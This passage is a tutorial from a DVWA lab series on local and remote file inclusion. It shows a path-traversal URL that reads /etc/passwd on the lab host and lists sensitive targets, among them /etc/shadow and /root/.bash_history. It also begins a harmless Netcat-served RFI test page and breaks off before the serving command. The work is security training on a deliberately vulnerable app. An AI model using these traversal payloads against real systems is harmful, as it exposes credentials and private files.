DVWA 1.9+: File Inclusion using Netcat as web server

Published in

Hacker Toolbelt

2 min readMay 16, 2019

This part 5 of the DVWA Lab, and in this part we’ll cover file inclusion. So what is file inclusion and why is it a big deal?

When a web applications allows the user to specify input directly to the file streams or upload files, it’s opening an attack vector to execute malicious code. If the malicious code file is in the target machine, this attack is called Local File Inclusion (LFI). If the files are external, it’s called Remote File Inclusion (RFI).

This is on more article of the DVWA series. You can grab all articles here.

Local File Inclusion

Open your browser, enter DVWA URL, login and navigate to the ‘file inclusion’ page.

If we click in the links file1.php, file2.php, file3.php and look the the generated URL, we can see that the filename is inserted in each page. Let’s tamper with the URL:

http://192.168.231.110/vulnerabilities/fi/?page=../../../../../etc/passwd

Remeber to set the security level to low.

The browser rendered the page with passwd contents. We can pry on other interesting files:

/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root

Remote File Inclusion

We’re going to try RFL in out target. First, let’s create a file to test:

$ nano rfi.php

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: netcat!
<!DOCTYPE html>
<html xmlns=”http://www.w3.org/1999/xhtml">
<head>
</head>
<body>
<h1>Fake DVWA page</h1>
<h2>Remote File Inclusion Test</h2>
</body>
</html>

We’re going to use same method as before, first create the file with a corresponding header, then serve the file using Netcat as a simple web server: